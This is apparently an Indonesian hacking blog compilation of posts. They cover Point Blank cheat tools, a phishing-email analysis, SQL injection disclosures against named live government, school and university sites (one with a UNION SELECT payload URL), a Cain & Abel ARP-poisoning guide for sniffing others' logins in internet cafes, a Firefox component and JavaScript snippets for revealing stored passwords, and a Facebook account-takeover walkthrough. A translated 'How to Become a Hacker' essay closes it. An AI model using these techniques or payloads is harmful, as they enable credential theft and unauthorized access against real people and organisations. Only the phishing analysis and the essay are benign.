Point Bank Hack 13 Juni 2013

KETERANGAN :

Time

Date

FPS

Wallhack

Mini Indo

Chams Tero

Chams Police

X-Hair

No Smoke

No Fog

No Flash

Box

Health

Name Tag

Esp Line

Anti Respwn

Hp Up +20

Quick Fast

Unyu Mode | Bug Wallshot

Dino Replace Hack

Speed Mode

Plant Bom

Defuse Bom

Ghost Wanna Be!

Auto Bug LuxvilL

Ammo Limited

Accuracy 100%

Quick Change

Set Replace

Auto Headshot

Auto Fire Shoutgun

Anti Program Ilegal

Anti Banned

Check Premium

Exit Game

D3d Menu On/OFF : INSERT

Arah Panah kanan = ON

Arah Panah Kiri OFF

Arah Panah ats & Bawah Pilih cit

TUTORIAL

Buka PB launcher

Buka Cheat

Start

Keluar Message Box/notice

Ok,ok saja Hepii Cheatting dah
nih cheatnya sob CHEAT

Read More

Update CHEAT FULLHACK+AUTO HS 13-06-2013

 halo sob, nih ade cheat khsus buat kalian para cheaters, saran gue cuma 1 hati" kena banned oke (y)

Clean Wallhack tekan F1
Chams Police tekan F2
Chams Teroris tekan 3


D3D MENU
X-Hair
No SMoke
No Fog
[ESP MENU]
ESP Box
ESP Name
ESP Line
ESP Health 1
ESP Health 2
[Cheat]

Grade
Unl.AMMo
No Respon
Hp up 120
Quick
Auto HS (New)
Damage Up (New)
Makro Quick Super
Hollow | HS random | 1 hit cakar DIno
Bug Luxvile
Ammo Frezze

[Option]

Akurasi
No Vote
Fire speed
No Banned
[Config]
Exit
Display
Premium
Lock Time

Hotkeys D3D Menu:
D3d Menu On/OFF : INSERT
Arah Panah kanan = ON
Arah Panah Kiri OFF
Arah Panah ats & Bawah Pilih cit

Tutorial :
Buka PB launcher
Buka Cheat
Start
Keluar Message Box/notice
Ok,ok saja Hepii Cheatting dah

Download

Read More

Dapet E-mail *Your account will be suspended*

Pernahkah account email anda dihack?? Dan kenapa hal itu bisa terjadi pada diri anda?? Nah, Pada kesempatan kali ini, saya akan mencoba berbagi pengalaman dalam meningkatkan keamanan akun facebook, email, dll, Penasarankan bagaimana caranya??

Beberapa hari yang lalu, saya mendapatkan sebuah email yang isinya katanya akun gmail saya di suspen, karena melanggar beberapa peraturan di google. Kaget juga awalnya, tapi apakah benar demikian???? Mari kita cari tahu,, hehehe

Isi emailnya :

Quote:Your profile will be blocked in response to a complaint received by the administration 01/26/2011.
According to provision 13.3 of Terms, Google may at any time, terminate its Services for account.

You can refute the statement, by following this link:
http://support.gmail.com/cgi-bin/unblock?ID=920965416

If this complaint has not been rejected for 2 days, your mail account will be blocked.
Complaint ID: 920965416.

Google Team

Bagaimana? Sungguh meyakinkan bukan?? Untuk lebih jauh, mari kita tela'ah lebih dalam lagi. Coba perhatikan screenshot dibawah ini.



Dari screenshot di atas, kita dapat informasi tentang alamat si pengirim email, yakni qoogle.com (bukan google.com). Mirip bukan?? Bedanya hanya di huruf depannya saja, yakni "q" (huruf Q) untuk qoogle.com dan huruf "G" untuk google.com. Dari sini kita sudah bisa mengambil kesimpulan, bahwa ini email "PALSU" yang mencoba menghack email kita. Mmm, tapi apakah cuma seperti itu?? Ya, tidak dong. Untuk membuktikan lebih jauh, mari kita lanjutkan pembahasan nya.

Didalam pesan masuk tersebut, saya menemukan sebuah link "http://support.gmail.com/cgi-bin/unblock?ID=920965416" (nama teks link nya) dan isi linknya sendiri mengarah ke "http://login-google.com/unblock/en/920965416/?account=remo.xp89@gmail.com". Wah, kok bisa yah?? Pasti penasaran dong sobat blogger dengan tampilan web nya?? Coba cek dibawah,,



Bagaimana?? Ada yang aneh?? Coba bandingkan dengan halaman GoogleMail yang asli.



Adakah perbedaannya?? Yups, jelas ada lah. Disini kita bisa melihat, tampilan untuk "google palsu" disebelah kirinya kosong, sedangkan untuk "google asli" terdapat informasi tentang google mail itu sendiri.

Di halaman google mail palsu, saya mencoba untuk login dengan memasukan alamat email dan password asal-asalan, tapi apa yang terjadi???



Hahaha, password asal-asalah di katakan sukses buat konfirmasi. Nah, sehabis muncul tampilan halaman di atas, nggal lama kemudian sobat akan dibawa kehalaman aslinya google, hal ini dilakukan tentu ini agar tidak mencurigan si pemilik email. Jadi mungkin alurnya kerja seperti ini.

"Kita mendapat pesan yang isinya bahwa akun email kita akan di suspen bila tidak melakukan konfirmasi dengan mengunjungi link yang sudah disertakan dalam pesan tersebut. Bila kita klik link tersebut, kita akan disuruh untuk memasukan alamat email dan password dengan tujuan untuk mengkonfirmasi akun email kita. Bila kita sudah memasukan email dan password, kita akan mendapatkan pesan bahsa kita telah sukses melakukan konfirmasi dan selanjutnya kita akan di bawa ke halaman google mail asli. (pinter yah caranya,, hehe)"

Read More

Hack All Password Via Mozilla

Langsung no lama

Step-by-step
~ Niat
~ Download JScript nya disini
~ Extract filesnya, & copy / pindahkan ke C:\Program Files\MozillaFirefox\components
~ Lalu restart browsernya !

Hasilnya :

Cara melihat hasilnya :
~ klik "tools" pada mozilla lalu "options" klik pada tab
"security"trus "save pasword" trus tinggal klik "show password"

NB :
~ Ini otomatis save password di mozila nya (biasanya suka ada konfirmasinya di atas)
~ Maaf, ane ngeshare tutor cupu
~ Mungkin belum ada yg tau
~ Mungkin yang punya warnet / OP warnet trick ini cocok
~ Kalo berguna, reputasinya donk

Read More

SQL injection vulnerability situs pemerintah kalimantan

#############################################
# Exploit Tittle : SQLi                     #
# Author         : SyMiN                    #
# Tested         : linux bt5r2              #
# Date           : 21 Mar , 2012            #
#############################################


[title]
# SQL injection vulnerability situs pemerintah kalimantan


[note]
# Telah di temukan bug SQL Injection di website:
  http://pkkprovkalsel.or.id
  oleh SyMiN

http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72[vuln]

[coba]

http://pkkprovkalsel.or.id/berita_detail.cfm?judul=72%20UNION%20SELECT%201,2,version%28%29,user%28%29,5,6--

[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v

Thanks to : http://pastelcyber.blogspot.com/

Read More

#############################################
# Exploit Tittle : SQLi                     #
# Author         : Eagle                    #
# Tested         : linux bt5r2              #
# Date           : 20 Mar , 2012            #
#############################################


[title]
# Bug Research www.sman10-smg.sch.id SQL Injection Vulnerabilitiy


[note]
# Telah di temukan bug SQL Injection di website:
  http://sman10-smg.sch.id
  oleh MoEZad


[vuln]
# http://sman10-smg.sch.id/?v=nw&id=[SQLi]


[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v
thankz to : http://pastelcyber.blogspot.com

Read More

CMS Forix SQL Injection Vulnerabilitiy

#############################################
# Exploit Tittle : SQLi FORIX               #
# Author  : MoEZad                   #
# Tested  : linux bt5r2              #
# Dork  : "items.php?cid="         #
#############################################


[POC]
- http://www.target.com/items.php?cid=[injection here]
[Page Admin]
- http://www.target.com/admin


NB:user adminnya berada di table acl 


thankz to : PastelCyber

Read More

Bug Research www.metallurgy.itb.ac.id SQL Injection Vulnerabilitiy

#############################################
# Exploit Tittle : SQLi                     #
# Author         : MoEZad                   #
# Tested         : linux bt5r2              #
# Date           : 17 Mar , 2012            #
#############################################


[title]
# Bug Research www.metallurgy.itb.ac.id SQL Injection Vulnerabilitiy


[note]
# Telah di temukan bug SQL Injection di website:
  http://metallurgy.itb.ac.id
  oleh MoEZad


[vuln]
# http://metallurgy.itb.ac.id/berita/index.php?id=[SQLi]


[thx]
# MAGELANG CYBER TEAM
# INDONESIAN CODER TEAM
# KILL-9 CREW
# PASTEL CYBER CREW


[piss]
# just testing security (^_^)v 

Thankz to : Pastelcyber

Read More

Password FB Hacking Via |*C3*|_Alfian_|

nih Kasih Ilmu sya,, setelah sya pikir - pikir mending bagiin ama yang belum tahu heheh.. maaf so tempe... tutorial cain dan abel
Siapa tidak tahu pasangan serasi dalam dunia hacking? ya Cain & Abel, keduanya merupakan pasangan untuk melakukan hack dalam jaringan dengan fitur yang cukup lengkap. Nah ane disini mau kasih tutorial cain & abel + preview.

Link download cain & abel:

http://www.oxid.it/cain.html

Untuk proses installnya gak usah di ajarin ya.. aku anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang aku lakuin.
langsung aja buka cain + abelnya..
klik start / stop sniffer seperti pada gbr :



Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini :



pada mac address scan langsung klik OK saja
maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya:

setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja.
Klik APR di tab bagian bawah, dan tampilan akan seperti ini:



di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?]
masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya.
yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja.
Nah abis itu klik ok.
Abis langkah itu maka tampilannya seperti ini:



Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning:



Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan
langsung saja masuk ke dalam password dengan klik tab password di bagian bawah:



nah klik dibagian kiri HTTP, dan lihat hasilnya: jangan ampe kaget om heheheh...



selesai
Itu ada sengaja ada 1 yang gak aku tutup, coba aja masih bisa buat login pa gak.... selamat mencoba dan happy kang...

Read More

Mengintip Password Dengan Java Scrip

Konsepnya sederhana. Password yang tersimpan pada browser biasanya dienkripsi dan ditampilkan dalam kode asterisk (*). Maka perintah javascript berikut bertugas untuk mendeskripsi dan menampilkan password.

Gambar disamping adalah screenshot dari perobaan saya pada login form twitter dengan browser Mozilla Firefox 4 beta.


Caranya sangat mudah. Cukup mengcopy perintah javascript dibawah lalu paste pada bagian adressbar browser anda. Lalu akan muncul pop up yang menampilkan password yang telah terdekripsi.

j alert(document.getElementById('Passwd').value);


Dan dibawah ini adalah alternatif perintah javascript yang bisa anda gunakan

Read more: Mengintip Password Dengan Javascript | ega blog

Code:

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j)
{ f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + ""; } } if (s) alert
("Password: " + s); else alert
("Tidak ada password.");})();


Read more: Mengintip Password Dengan Javascript | chibi-cyber.com

Read More

Hack Facebook Tanpa Software

 

pertama² anda harus cari target yg mau di hack dllu misalkan cari aja email'y....

☻ kk bagai mana kallo misalkan email'y di sembunyi'in...??
♦ Gampang ko... tnggal masukkin aja ID pengguna'y ..

langkah ke dua kita login ke fb target yg mau di hack... misalkan nih bisa pake email'y bisa juga page nama pengguna nya



nah di bagian pasword nya isi ngasal aja



step slanjut nya ikuti aja iaa seperti gambar di bawah



Terusss,,, masukkan email baru nya , bwat ntar kita log in, ke Fb si DIA..



Teruss nah disin mah mimilikkan weh nya.. bisa liat dllu profil FB nya dia kadang" suka bener da... hehehehhe



tengtettttttttttttt.. kalo misalkan bener jawaban'y, tampilan nya langsung BERBUAH eh sallah ,,, Berubah Maksudnya...
jadi Mirip Seperti Gambar Di bawah..



hmzzzzzzzzzzz.. langsung aja deh Isi Pasword semau'y masss BOY
, kallo misalkan udh di isi PAsword'y , pasti dapet notice kaya gini ceunah..

Please check your email
Congratulations, you have successfully proved your identity.
An email was sent to haker.goblog@yahoo.com. Click on a link in that email to continue your account recovery process.
If you have not received an email in 30 minutes, see the Help Center.



kaya gambar di bawah nihh..



.. nah kallo misalkan udh,,, yu mari mass kita buka EMAIL yg kita Masukkan Tadi..

kita check INBOX'y . nah kalo misalkan ada inbox kaya gini,,, berarti suksesssss



horeeee langsung aja pilih ""Silakan klik tautan berikut ini untuk melanjutkan proses pemulihan""

eitsss tapi jangan seneng dllu itu email sama pass nya belum bisa di pake ,, harus nunggu 24 jam 32 menit...
hahahahahahha selamat menunggu

Read More

Tutor Cara Hack CREDIT Facebook

Sebelumnya Kalo Ane MInta Maaf!!...
Tapi nie KayalNya NggaK Udah Ane Lihat Gx ADA Yg Share Kyk GINI!!
Oke Langsung Ajha Ganz!!..

CARA MENDAPATKAN FACEBOOK CREDIT GRATIS SUDAH TERBUKTI!!!
SPECIAL THANKS TO http://WWW.GAMECOINS.COM
FACEBOOK CREDIT dapat digunakan untuk membeli EMBLEM & TOKEN NINJA SAGA SECARA LEGAL!!! Dan untuk itulah tutorial ini dibagikan secara gratis agar diharapkan member clan dapat menyumbang token secara LEGAL!!!
1. aktifkan facebook masing-masing
2. masuk http://gamecoins.com/
di bagian pojok kanan atas ada tulisan "connect with facebook",
3. berikutnya tekan "start mission",
4. kumpulkan sebanyak-banyaknya dengan memainkan game-game yg ada di bawah ini
-build the first stone for your pyramid
-past the first level of bubble popp 2
-Login and Shop Free on IMVU
-finish the chocolatier sweet society tutorial
-finish market street tutorial
-create a dawn of the dragons character
5. setelah terkumpul gamecoin yang banyak, bisa ditukar ke http://gamecoins.com/facebook/marketplace/
PS: 100 gamecoin = 5 FB credit
SELAMAT MENCOBA !!!

Read More

Pengen Jadi Hacker Pelajarin Dulu Ini!!

Thread Di Bawah

Di Bawah


pa Hacker Itu?

Jargon File memuat beberapa definisi
untuk kata ‘hacker’, hampir semuanya berkaitan dengan kemahiran teknis
serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Namun
jika ingin /menjadi/ seorang hacker, hanya ada dua definisi yang relevan.

hacker
Ada sebuah komunitas, budaya, terdiri dari para programer mahir dan ahli
jaringan, yang sejarahnya bermula dari dekade minikomputer pertama yang
memiliki time-sharing dan zaman eksperimen awal ARPAnet. Dari anggota
budaya inilah muncul istilah ‘hacker’. Hackerlah yang membangun
internet. Hackerlah yang membuat sistem operasi Unix menjadi seperti
sekarang. Hackerlah yang mengoperasikan Usenet. Hacker yang membuat
World Wide Web berjalan. Jika Anda bagian dari budaya ini, jika Anda
telah menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya
mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.

Cara pikir hacker tidak terbatas pada budaya hacker software. Ada orang
yang menerapkan sikap hacker pada banyak bidang lain, elektronik atau
musik — bahkan, cara pikir hacker ada di tingkat tertinggi setiap
bidang ilmu dan seni. Hacker software mengakui semangat serupa ini dan
kadang menyebut orang-orang tersebut “hacker” pula — sebagian juga
berpendapat bahwa sifat seorang hacker tidak bergantung pada wadah
tempatnya bekerja. Tapi, untuk selanjutnya, kita akan memusatkan
perhatian pada software hacker, keahlian dan sikap mereka, serta tradisi
budaya bersama yang melahirkan istilah ?hacker?.

Terdapat pula sekelompok lain yang menyebut-nyebut diri hacker, padahal
bukan. Mereka-mereka ini (terutama terdiri dari remaja pria) mendapat
kepuasan lewat membobol komputer dan mengakali telepon (phreaking).
Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul
dengan mereka. Hacker sejati memandang cracker sebagai orang malas,
tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak
setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah
menjadi hacker, sama seperti jika dikatakan bahwa mengontakkan mobil
membuat seseorang langsung menjadi ahli mesin. Sayangnya, wartawan dan
penulis telah salah kaprah dan menggunakan kata ‘hacker’ untuk
melukiskan cracker; sesuatu yang selalu membuat kesal para hacker sejati.

Perbedaan mendasar antara hacker dan cracker: hacker membangun, cracker
membongkar.

Jika Anda ingin menjadi hacker, lanjutkan membaca. Jika ingin menjadi
cracker, kunjungi newsgroup alt.2600 dan bersiaplah
menghabiskan lima sampai sepuluh tahun di balik jeruji setelah
mengetahui bahwa Anda ternyata tidak sepandai yang Anda kira. Hanya itu
yang perlu dikatakan tentang cracker.

3. Sikap Hacker

Pekerjaan hacker menyelesaikan masalah dan membangun sesuatu, dan hacker
percaya pada kebebasan dan kerjasama sukarela. Agar dapat diterima
sebagai seorang hacker, Anda harus berbuat seolah-olah Anda memiliki
sikap ini. Dan agar dapat berbuat demikian, sikap ini harus benar-benar
diyakini.
Sikap Inti Seorang Hacker:
Tidak Penah Sombong (Dengan Hasil Miliknya).
Selalu Membalas Pesan Dari Temannya (Teman Satu Club/Communitas).
Selalu Berusaha Menciptakan Hal – Hal Baru.
Selalu Berpikir Jernih/Positif ,Tidak Menuju Hal – Hal Buruk (Seks)
Tapi kalau Anda berniat menumbuhkan sikap ini hanya agar dapat diterima
di lingkungan hacker, maka Anda belum menangkap maknanya. Menjadi orang
yang meyakini sikap hacker penting bagi /Anda sendiri/ — agar bisa
terus belajar dan termotivasi. Sama seperti semua seni kreatif lain,
cara paling efektif untuk menjadi seorang ahli adalah dengan meniru cara
berpikir ahli-ahli lainnya — bukan hanya secara intelektual tapi juga
emosional.

Seperti diungkapkan oleh sebuah sajak Zen modern di bawah:

Untuk mengikuti jalan:
pandanglah sang ahli,
ikuti sang ahli,
berjalan bersama sang ahli,
kenali sang ahili,
jadilah sang ahli.

Jadi, jika ingin menjadi hacker, ulangi pernyataan di bawah ini sampai
benar-benar Anda yakini:

3.1 Dunia penuh dengan persoalan-persoalan menarik yang menanti
untuk dipecahkan.

Menjadi seorang hacker sebetulnya menyenangkan, tapi ‘menyenangkan’ yang
menuntut usaha. Usaha ini membutuhkan motivasi. Atlet yang sukses
memperoleh motivasi dari kepuasan fisik saat tubuh mereka beraksi, saat
mendorong diri melampaui batasan fisik. Demikian juga, untuk menjadi
seorang hacker Anda harus merasa tertarik memecahkan persoalan, mengasah
keahlian, dan melatih kecerdasan.

Jika Anda merasa bukan seperti ini secara naluri, Anda harus berusaha
menjadi demikian jika ingin berhasil menjadi hacker. Jika tidak, energi
hacking Anda akan melemah karena perhatian teralihkan oleh seks, uang,
dan kedudukan.

(Anda pun harus mengembangkan keyakinan pada kapasitas belajar diri –
keyakinan bahwa meskipun yang Anda ketahui belum cukup untuk memecahkan
suatu persoalan, jika satu potongan saja dari persoalan Anda usaha
pecahkan, maka itu sudah cukup memberi pelajaran kepada Anda untuk
menyelesaikan potongan berikutnya — dan berikutnya, hingga semua
potongan terselesaikan.)

3.2 Tidak seharusnya masalah yang sama dipecahkan dua kali.

Otak yang kreatif merupakan sumber daya yang berharga dan terbatas.
Tidak seharusnya sumber daya ini diboroskan hanya untuk memikirkan
kembali suatu persoalan dari dasar; padahal ada begitu banyak masalah
menarik baru lain di dunia ini yang menanti.

Agar dapat bertingkah laku seperti hacker, Anda harus percaya bahwa
waktu berpikir hacker lain itu berharga — sebegitu berharganya hingga
merupakan suatu kewajiban moral bagi Anda untuk membagikan informasi,
menyelesaikan masalah lalu memberi jawabannya pada hacker lain supaya
mereka menyelesaikan masalah /baru/ dan tidak selamanya berkutat pada
masalah-masalah lama.

(Tidak harus berkeyakinan bahwa /semua/ produk kreatif Anda harus
direlakan bagi orang lain, meski hacker yang demikianlah yang paling
dihormati hacker lain. Menurut nilai-nilai hacker, jual saja sebagian
asal cukup untuk tetap makan, tetap dapat membayar sewa rumah, dan tetap
dapat memakai komputer. Tidak melanggar nilai hacker jika Anda
memanfaatkan ilmu Anda untuk membiayai keluarga atau bahkan memperkaya
diri, asalkan sambil melakukannya tetap setia pada disiplin ilmu dan
sesama hacker lain.)

3.3 Kebosanan dan pekerjaan membosankan itu jahat.

Hacker (dan manusia kreatif pada umumnya) tidak seharusnya dibosankan
dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti mereka
tidak melakukan pekerjaan yang hanya bisa dilakukan oleh mereka –
menyelesaikan persoalan-persoalan baru. Pemborosan sumber daya ini
merugikan semua pihak. Karena itu kebosanan dan pekerjaan membosankan
bukan saja tidak menyenangkan tapi juga jahat.

Agar dapat bertingkah laku seperti hacker, Anda harus meyakini hal ini
sehingga Anda berkeinginan untuk mengotomasi sebanyak mungkin bagian
yang membosankan, bukan saja bagi diri sendiri tapi juga orang lain
(terutama sesama hacker).

(Ada satu kekecualian yang jelas. Hacker kadang melakukan pekerjaan yang
di mata orang lain tampaknya berulang-ulang atau membosankan; ini untuk
latihan menjernihkan pikiran, atau dalam rangka memperoleh keahlian atau
pengalaman yang tak bisa tidak harus diperoleh dengan cara demikian.
Tentu saja hal ini dilakukan atas dasar kehendaknya sendiri — setiap
orang yang mampu berpikir tidak seharusnya dipaksa menjadi bosan.)

3.4 Kebebasan itu baik.

Secara alamiah hacker itu anti-otoriter. Siapa pun yang dapat memerintah
Anda akan dapat menghentikan Anda untuk menyelesaikan persoalan yang
menarik — dan, sesuai pikiran otak para otoriter, pada umumnya akan
membuat alasan yang benar-benar bodoh untuk itu. Jadi sikap otoriter
harus dilawan di mana pun Anda berada, agar nantinya tidak menekan Anda
dan hacker-hacker lain.

(Tidak untuk disamakan dengan melawan setiap bentuk kekuasaan. Anak-anak
tetap harus dibimbing, para kriminal ditahan. Seorang hacker mungkin
akan tunduk pada bentuk-bentuk kekuasaan tertentu agar dapat memperoleh
sesuatu yang lebih dari waktu yang dibutuhkan untuk mengikuti peraturan.
Ini lebih merupakan tawar-menawar yang terbatas dan dilakukan secara
sadar; jenis tunduk diri yang diinginkan oleh orang-orang otoriter tentu
saja tidak bisa diterima.)

Para otoriter hidup di atas sensor dan kerahasiaan. Mereka tidak percaya
pada kerjasama dan berbagi informasi — satu-satunya jenis ‘kerja sama’
yang disukai adalah yang dapat mereka kendalikan. Jadi untuk berlaku
seperti seorang hacker, Anda perlu mengembangkan rasa benci pada
penyensoran, kerahasiaan, dan penggunaan kekerasan atau penipuan untuk
memaksakan kehendak pada orang dewasa. Dan Anda harus bersedia bertindak
atas dasar keyakinan ini.

3.5 Sikap saja tak ada artinya tanpa keahlian.

Untuk menjadi hacker, Anda perlu mengembangkan sebagian dari sikap-sikap
yang telah disebutkan. Tapi memiliki sikap saja belum membuat seseorang
menjadi hacker, atau atlet juara atau bintang rock. Untuk menjadi hacker
dibutuhkan kecerdasan, latihan, dedikasi, dan kerja keras.

Jadi, Anda perlu belajar untuk tidak mempercayai sikap saja dan
menghormati setiap bentuk kemampuan. Hacker tidak bersedia menghabiskan
waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker
memuja keahlian — terutama keahlian dalam hacking, tapi juga keahlian
di bidang apapun. Yang terlebih bagus lagi yaitu keahlian dalam bidang
yang sulit dan hanya dapat dikuasai oleh sedikit orang, dan yang terbaik
adalah keahlian dalam bidang yang sulit dan melibatkan ketajaman mental,
keahlian, serta konsentrasi.

Bila Anda memuja keahlian, Anda akan merasa senang dalam meningkatkan
kemampuan diri — kerja keras dan dedikasi akan menjadi semacam
permainan yang mengasyikkan ketimbang pekerjaan membosankan. Dan hal ini
penting dalam proses menjadi hacker.

4. Kemampuan Hacking Dasar

Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan
pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat
tool yang perlu Anda kuasai sebelum orang bahkan bisa berpikir memanggil
Anda hacker.

Perangkat tool ini perlahan-lahan memang berubah seiring teknologi yang
menciptakan keahlian baru dan membuat keahlian lama tidak berguna.
Misalnya, dulu keahlian pemrograman bahasa mesin termasuk, dan kemampuan
HTML belum dan hanya baru-baru ini saja. Yang jelas saat ini yang
termasuk adalah:

4.1 Pelajari pemrograman.

Ini tentunya merupakan keahlian hacking yang fundamental. Jika Anda
belum pernah belajar bahasa pemrograman mana pun, saya sarankan mulai
dengan Python . Disainnya bersih, terdokumentasi
dengan baik, dan cukup mudah bagi pemula. Meski menjadi bahasa pertama,
bukan berarti Python hanya mainan; Python amat ampuh dan fleksibel dan
cocok untuk proyek-proyek besar. Saya menulis evaluasi terhadap Python
yang
lebih mendetil. Tutorial Python bisa dilihat di situs web Python
(terjemahan Indonesia
).

Java juga bahasa yang baik untuk belajar pemrograman. Lebih sulit dari
Python, tapi menghasilkan kode yang lebih cepat dari Python. Menurut
saya Java amat bagus sebagai bahasa kedua.

Perlu diingat bahwa dengan satu dua bahasa pemrograman saja Anda tidak
akan mencapai tingkat keahlian seorang hacker, atau bahkan seorang
programer — Anda perlu belajar cara memandang pemrograman secara umum,
tidak bergantung pada satu bahasa mana pun. Untuk menjadi hacker sejati,
Anda perlu mencapai tahap di mana Anda dapat mempelajari bahasa baru
dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan
apa yang telah Anda ketahui. Hal ini berarti, Anda perlu mempelajari
beberapa bahasa yang jauh berbeda satu dengan yang lainnya.

Jika ingin serius dalam pemrograman, pada akhirnya Anda harus belajar C,
bahasa inti sistem operasi Unix. C++ terkait erat dengan C; jika tahu
yang satu, belajar yang lain tidak akan susah. Namun keduanya bukan
bahasa yang cocok untuk dipelajari pertama kali.

Bahasa lain yang juga penting untuk hacker antara lain Perl
dan LISP .
Perl patut dipelajari untuk kebutuhan praktis; Perl dipakai secara amat
meluas untuk halaman web aktif dan untuk administrasi sistem, jadi
meskipun nantinya Anda tidak akan membuat program dalam Perl, Anda
sebaiknya belajar cara membaca Perl. LISP patut dipelajari karena akan
memberikan pengalaman ‘membuka pikiran’ jika Anda telah menangkapnya;
dengan mempelajari LISP, Anda akan menjadi seorang programer yang lebih
baik, meskipun dalam kenyataan Anda akan jarang memakainya.

Paling baik sebetulnya mempelajari semuanya (Python, Java, C/C++, Perl,
dan LISP). Selain merupakan bahasa-bahasa terpenting dalam hacking,
masing-masing mewakili cara pendekatan pemrograman yang berbeda, dan
tiap bahasa akan memberi Anda pelajaran-pelajaran berharga.

Tentu saja, di sini tidak mungkin saya memberi petunjuk lengkap cara
memrogram — pemrograman merupakan keahlian yang kompleks. Tapi, satu
petunjuk yang saya berikan: buku dan kursus saja tidak akan membuat Anda
menjadi seorang programer (banyak, mungkin hampir semua hacker terbaik
itu belajar mandiri). Anda akan menjadi programer dengan (a) /membaca
kode/ dan (b) /menulis kode/.

Belajar membuat program adalah seperti belajar menulis dalam bahasa
alamiah. Cara terbaik untuk melakukannya dengan membaca tulisan yang
dibuat oleh para ahlinya, membuat tulisan sendiri sedikit, membaca lebih
banyak lagi, menulis lebih banyak, dan mengulanginya sampai di tulisan
Anda mulai terbentuk semacam kekuatan dan kemahiran penggunaan kata
seperti di tulisan-tulisan yang semula Anda teladani.

Dahulu sulit mencari kode yang baik untuk dibaca, karena dulu hanya
sedikit program-program besar yang terdapat dalam bentuk source untuk
bisa dibaca dan diutak-atik hacker-hacker pemula. Sekarang kondisinya
jauh berbeda: software open-source, tool pemrograman, dan sistem operasi
(semua dibuat oleh hacker) kini banyak terdapat. Dan ini mengantar kita
pada poin berikutnya?

4.2 Cari, pelajari, dan jalankan salah satu versi Unix open-source.

Saya anggap Anda memiliki, atau memperoleh akses ke komputer pribadi
(anak-anak sekarang mudah sekali mendapatkan akses :-) ). Kalau ada satu
langkah terpenting bagi pemula untuk mendapatkan kemampuan hacker, itu
adalah mendapatkan satu salinan sistem operasi Linux atau salah satu
Unix BSD, meng-install-nya di komputer sendiri, dan menjalankannya.

(Tidak saya sarankan meng-install Linux sendirian jika Anda pemula. Cari
klub komputer atau kelompok pengguna Linux di daerah Anda dan mintalah
bantuan; atau hubungi Linux Internet Support Co-Operative
. LISC mengurus channel-channel IRC
tempat Anda dapat bertanya).
Tentu, di dunia ini ada banyak sistem operasi selain Unix. Tapi
sistem-sistem operasi tersebut didistribusikan dalam program jadi
(binary) — kodenya tidak bisa Anda baca, sehingga sistem operasi
tersebut tidak bisa Anda modifikasi. Belajar hacking di DOS atau Windows
atau MacOS adalah bagaikan belajar menari dengan seluruh tubuh digips.

Lagipula Unix-lah sistem operasi Internet. Meski tentu bisa belajar
menggunakan internet tanpa mengenal Unix, Anda tak akan mampu menjadi
hacker Internet tanpa memahami Unix. Untuk alasan inilah, budaya hacker
saat ini cukup cenderung berat ke Unix. (Ini tidak selalu benar,
beberapa hacker zaman dahulu tidak menyukai kenyataan ini, tapi
simbiosis antara Unix dan Internet telah menjadi kuat sehingga bahkan
otot Microsoft pun tak mampu membengkokkannya.)

Jadi, buatlah sistem Unix — saya pribadi menyukai Linux tapi tentu saja
ada yang lainnya (dan ya, Anda /bisa/ menjalankan Linux dan DOS/Windows
di mesin yang sama). Pelajari Unix. Jalankan Unix. Bermain-mainlah
dengan Unix. Berhubungan dengan internet melalui Unix. Baca kodenya.
Modifikasi. Di Unix Anda akan menjumpai tool pemrograman yang lebih baik
(termasuk C, Lisp, Python, dan Perl) ketimbang di sistem operasi
Microsoft manapun, Anda akan bersenang-senang, dan Anda akan mendapat
pengetahuan lebih dari yang Anda sadari sampai kemudian ketika mengenang
kembali Anda telah seorang hacker ahli.

Lebih jauh tentang mempelajari Unix, lihat The Loginataka
.

Untuk memperoleh Linux, lihat Where can I get Linux
.

Bantuan dan resource BSD Unix bisa Anda lihat di http://www.bsd.org
.

Saya menulis pengantar dasar Unix dan Internet
.

(Catatan: Saya tidak menganjurkan menginstal Linux atau BSD sendirian
jika Anda seorang pemula. Untuk Linux, carilah sebuah kelompok pengguna
lokal Linux [KPLI di Indonesia] dan mintalah bantuan mereka; atau
hubungi Open Projects Network . LISC
memaintain daftar IRC channel
yang bisa Anda datangi untuk memperoleh bantuan.)

4.3 Pelajari cara menggunakan World Wide Web dan cara menulis HTML.

Kebanyakan hasil budaya hacker bekerja di belakang layar tanpa diketahui
orang banyak, membantu mengoperasikan pabrik, kantor, dan universitas,
tanpa ada pengaruh yang jelas pada cara hidup para non-hacker. Web
adalah satu kekecualian, bahkan para politisi pun mengakui bahwa barang
mainan hacker yang besar dan berkilauan ini telah mengubah dunia. Untuk
satu alasan ini saja (dan juga banyak alasan bagus lainnya) Anda perlu
mempelajari cara pengoperasian Web.

